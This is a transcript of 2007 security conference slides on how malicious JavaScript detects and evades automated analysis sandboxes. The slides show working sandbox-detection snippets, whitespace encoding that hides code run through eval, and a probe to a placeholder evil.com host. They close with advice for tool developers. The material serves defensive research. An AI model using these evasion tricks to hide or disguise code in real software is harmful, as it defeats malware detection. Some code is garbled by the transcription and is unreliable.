Circumventing Automated JavaScript Analysis Billy Hoffman ([email protected]) HP Web Security Research Group © 2007 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Download ReportTranscript Circumventing Automated JavaScript Analysis Billy Hoffman ([email protected]) HP Web Security Research Group © 2007 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Circumventing Automated JavaScript Analysis Billy Hoffman ([email protected]) HP Web Security Research Group © 2007 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice Overview • JavaScript is part of attackers toolkit − All the “vanilla” stuff over − Packing traditional malware • IBM ISS: “In second half 2007 Web attack obfuscation approached 100%”* • Exploit frameworks amplify the problem − Rapid adoption of new techniques • We need tools to analyze this • How are we doing and can we win? * From: IBM Internet Security Systems X-Force® 2008 Mid-Year Trend Statistics Obfuscation Design Pattern • Malicious code is stored − String literals − Numeric literals • Decode function unpacks literals into new code • Ratio of literals to total code is huge! − Normal code: 2%-7% − Obfuscated code: > 30% Obfuscation Example Obfuscation != Malicious • Legitimate reasons for obfuscating − “Protect” client-side code − Reducing download size • Common packers − JSMin − Dean Edwards packer − Yahoo’s • Result: Its tough to know what to analyze Original Approach to JS Analysis • The Lazy Method − Replace dangerous calls with alert() − Run in a browser • The Tom Liston Method − Wrap writes in <TEXTAREA>’s − Run in a browser • The Perl-Fu Method − Port malware to in Perl • The Monkey Wrench Method − Run it in Spider Monkey Tricks to Defeating Analysis • Deliberate sandbox breaks − </TEXTAREA> • Integrity Checks − Arguments.callee.toString() • arguments.callee.toString().replace(/\W/g,"").toUpperCase(); − Gives source code of function body • Length checks • Use function body as key VBScript Wrapper • Still in use! − Older DHTML web apps − Plug-in enumeration (IE8) − Malware JavaScript • No open source VBScript parsers VBScript • No public standard grammar • Not very wide-spread JavaScript Preventing Sample Collection • Can’t reverse what you don’t have! • Track IPs − Geolocation − Blacklist security firms • Serve once per IP • User-agent sniffing • document.referrer tricks For those playing at home Approach Difficulties All Approaches Sampling Prevention The Lazy Method Integrity checks Running hostile code in browser The Tom Liston Method Integrity checks </TEXTAREA> escapes Running hostile code in browser Perl Fu Way too time consuming Translating JavaScript constructs The Monkey Wrench Approach Does pretty well Approach Today • Combination of automatic and manual • Interpreters and debuggers (aka sandboxes) − Rhino − NJS − DecryptJS − SpiderMonkey • Trap/monitor certain events − DOM calls − eval()s, etc Its More Complex Than That • JS interpreter/debugger less than ½ the battle • JavaScript != DOM − Host objects − Events/Timers − HTTP requests − Error handling • DOM >= HTML − HTTP headers/cookies − Browser environment − Plug-ins Fundamental Issue Current JavaScript sandboxes fail to fully/properly emulate browser environment. These discrepancies are detectable by the JavaScript running inside the sandbox. Fundamental Issue . != Detecting JavaScript Sandboxes • 4 big areas − DOM Testing − Network Testing − Execution Environment Testing − Plug-in Testing • Use test results − Decrypt next layer − Handshake to serve next layer DOM Testing • Using the DOM values • Detecting presence/lack of • Get and sets on values • Interacting with HTML elements DOM Testing: Basic • Sandbox Specific Functions − gc() − clone() − trap() − untrap() − readline() • Malware forces SpiderMonkey to die − try {quit();} catch (e) { }; //more code here Detecting Sandbox Specific Functions if(typeof(gc)==“function”) {… } else {…} Function Clobbering • JavaScript is highly dynamic • Can redefine functions at runtime! 1 Redefining print() as quit() Redefining quit()To Nothing Intertwined DOM Properties • Various aliases in the DOM − document.location == window.location == document.URL − window == window.window == window.self == window.parent • == window.self.self.self.self... − Any global variable attaches to window • var spi = 5; window.spi == spi; //true • Set a value on one alias • Read on another alias • Different values means sandbox document.retarded • Mosaic Netscape 0.9beta (1994) • Set using HTTP headers − Set-Cookie: − Cookie: • Get/Set using JavaScript − document.cookie document.retarded • Mosaic Netscape 0.9beta (1994) • Set using HTTP headers − Set-Cookie: − Cookie: • Get/Set using JavaScript − document.cookie • Set using HTML −<META> tag Meta Tag • Supply meta data about HTML document • http-equiv attribute − Allows document to specify HTTP headers − Content overriding an application protocol HTTP-EQUIV to the rescue • Setting cookies with HTML <html> <meta HTTP-EQUIV="Set-Cookie" CONTENT="cook2=Value 2"> <meta HTTP-EQUIV="Set-Cookie" CONTENT="cook1=Value 1"> <script> alert(document.cookie); </script> Setting Cookies with HTML Hello Proprietary Extension! • Setting cookies with HTML <html> <meta HTTP-EQUIV="Set-Cookie" CONTENT="cook2=Value 2; HttpOnly"> <meta HTTP-EQUIV="Set-Cookie" CONTENT="cook1=Value 1"> <script> alert(document.cookie); </script> Setting Cookies with HTML More Meta Tag Fun • Hide Script in non-scriptable attribute <html> <title>Safe</title> <meta http-equiv="refresh" content="0;url=javascript:alert(‘EVIL’)“> <h1>All safe. Trust me!</h1> </html> HTTP Refresh Header • Completely remove JS from response body! HTTP/1.1 200 OK Refresh: 0;url=javascript:alert('EVIL!') Connection: close Content-Length: 29 <h1>I'm Clean... really.</h1> Psst! (IE8 supports the data: URI... data:text/html and data:text/javascript are awesome!) Network Testing • Sandbox use dummy network objects − Good “Are you a browser?” test • Use information about response − DNS successful? − Last Modified? − Image Dimensions? − Valid Response? • Forces Sandbox to send network traffic − Web bugs for hackers? Network Testing – DNS Lookups <script> var count =0; function loaded(name) {if(name!="bad")count++;} window.onload = function evil() { if(count == 1) alert("Browser!"); else alert("Sandbox!"); } </script> <iframe src="http://doesnotexist1" onload="loaded(this.name);" name="bad"></iframe> <iframe src="http://doesnotexist2" onload="loaded(this.name);" name="bad"></iframe> <iframe src="http://exists/foo.html" onload="loaded(this.name);" name="good"></iframe> Network Testing – DNS Lookups Network Testing - Images • Image object provides rich meta data − Length − Width − Image was valid? • CSS Images too var img = new Image(); • Use this information img.onload = goodFunc; − Complex handshaking − Construct a Key img.onerror = badFunc; img.src="http://evil.com/" Side Note: Image Side Channels • JavaScript Image object • Height + width = 8 bytes • How to send 0xFFFFFFFF without 4GB of pixel data? − GIF, PNG, Windows too short − BMP + RLE? Nope • XBM Image Format #define w 1351 #define h 1689 static char b[]={0}; FF XBM WTF??!!!1111oneoneoneomg The Dan Kaminski Option Network Testing - Ajax • Ajax can see HTTP response headers − Complex handshaking − Construct a key var xhr = new XmlHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState==4 && xhr.status=200) { if(xhr.getResponseHeader("Secr3t") == "key") { //do evil } } } Execution Environment Testing • Sandbox execute code differently − Trap function calls − Step/break on code − Manipulate data • Can tell these differences − Timing information − Event Order − Error Handling Timing Information • Use JavaScript’s Date object − Millisecond resolution times • Can detect paused execution <script> var start = (new Date()).getTime(); document.writeln(String.fromCharCode(66,77,72)); </script> <script> var diff= (new Date()).getTime() - start; if(diff < 3) document.writeln("Browser"); else document.writeln("Sandbox"); </script> Detecting Steps/Breaks with Timers • Timers are a pain! − Can’t really wait 5 seconds − Ordering − Clearing • Can detect paused execution • Start a Timer Count++ Count++ … − Perform some math operation • After fixed interval − Sample the value Count++ Detecting Steps/Breaks with Timers var count = 0; setInterval("count++;", 10); setTimeout(checkSum, 1000); function checkSum() { //allow for skew if(count >= 950 && count <=1000) { alert("Browser"); } else { alert("Sandbox"); } } Event Order Sandboxs don’t run events in the proper order • XmlHttpRequest’s onreadystatechange() fires 4 times • onclick() >> onclick() >> ondbclick() • onkeydown() >> onkeyup() >> onkeypress() • onmousedown() >> onmouseup() >> onclick() • onmouseover() >> onmousemove() • onclick() >> onfocus() (for inputs) • onfocus() >> onblur() • onload() >> onunload() • Advanced Event Order • Dependant’s onload before window.onload − iFrames − Images • Event propagation − DOM events must bubble − Continue based on return value of event • Events that never fire − Invisible with CSS onclick WINDOW onclick BODY DIV DIV INPUT onclick Error Handling • window.onerror handles uncaught exceptions • Induce syntax errors • Recover in handler <script> window.onerror = function() { //evil code } </script> <script> Lolz &nd B00m$; //Syntax Error </script> Error Handling • window.onerror handles uncaught exceptions • Induce runtime errors • Harder to handle/debug window.onerror = function() { //evil code } function boom() { return ‘so long!’ & boom(); } boom(); // error too much recursion Advanced Error Handling • Detailed info passed to window.onerror − Message − File − Line Number • Can be to − Fingerprint web browser − Verify domain/location − Construct a decryption key Plug-in Testing • Not just navigator.plug-ins checks • Timing is a cool test − Did I really invoke that ActiveX object? • Sizing is a cool test − Is that Applet really 400 x 300? • Cross Communication − Really sexy! − Apply previous methods inside plug-in • Error handling, Eventing, etc JavaScript -> Flash -> JavaScript • Multiple ways − getURL(); − Flash LSO • Additional capabilities − Richer HTTP requests − More File formats • JavaScript Excellent browser support Flash JavaScript JavaScript -> Java -> JavaScript • • • • Lots of fun object casting − JSObject -> double -> JSObject JavaScript Java has more capabilities than JS − High resolution timers − Sockets Java − Internal IP Assault the researcher! − Signed Applets can access the file system! JavaScript LiveConnect − var myAddress = java.net.InetAddress.getLocalHost(); Preventing Sample Gathering • Browser Identification for Web Applications (Shreeraj Shah 2004) • HTTP headers − Ordering and Values − Redirects, form posts, content types, cookie settings • HTTP Caching − Obeying the directives • HTTP/1.1 HTTP/1.0 Precedence − Sending conditional GETs Crazy Idea #1 • Obfuscated Code is obviously interesting − But not always malicious • “Safe” looking code might not be interesting • Can I create code that doesn’t look malicious? Dehydrating a String • Converts any string into whitespace • 7 bit per character − 1 = space − 0 = tab • \n means we are done • ‘a’ = 1100001 • Dehydrate('a') = space, space, tab, tab, tab, tab, space Dehydrate Function function dehydrate(s) { var r = new Array(); for(var i=0; i < s.length; i++) { for(var j=6; j >=0; j—) { if(s.charCodeAt(i) & (Math.pow(2,j))) { r.push(' '); } else { r.push('\t'); } } } r.push('\n'); return r.join(''); } Hydrate Function function hydrate(s) { var r = new Array(); var curr = 0; while(s.charAt(curr) != '\n') { var tmp = 0; for(var i=6; i>=0; i—) { if(s.charAt(curr) == ' ') { tmp = tmp | (Math.pow(2,i)); } curr++; } r.push(String.fromCharCode(tmp)); } return r.join(''); } Invisible Malicious Code! //st4rt //3nd var html = document.body.innerHTML; var start = html.indexOf("//st" + "4rt"); var end = html.indexOf("3" + "nd"); var code = html.substring(start+12, end); eval(hydrate(code)); Crazy Idea #2 • Who cares how its encoded? • Eventually they have to execute the string of code • CaffeineMonkey et al are just hooking eval() • Can I execute malicious code stored in a string without eval()? Eval() The Interpreter has a Posse… var evilCode = "alert('evil');"; window.location.replace("javascript:" + evilCode); document.location.replace("javascript:" + evilCode); setTimeout(evilCode, 10); setInterval(evilCode, 500); new Function(evilCode)(); //IE only window.execScript(evilCode); 60 Fixing All of This • Advice for tool developers − Remove discrepancies between sandbox and browser • DOM/HTTP/DNS/Network/Eventing − Everything should be interesting − The sandbox needs a sandbox; you will be attacked. • Advice for others − Microsoft • Publish a Grammar for VBScript • Disable completely based on DOCTYPE − Adobe: Release an controllable Flash VM Shoulders of Giants • Jose Nazario • Ben Feinstein • Internet Storm Center guys • Stephan Chenette, et al. @ WebSense • Shreeraj Shah • Rob Freeman • Aviv Raff Questions? [email protected] Circumventing Automated JavaScript Analysis Billy Hoffman ([email protected]) HP Web Security Research Group © 2007 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice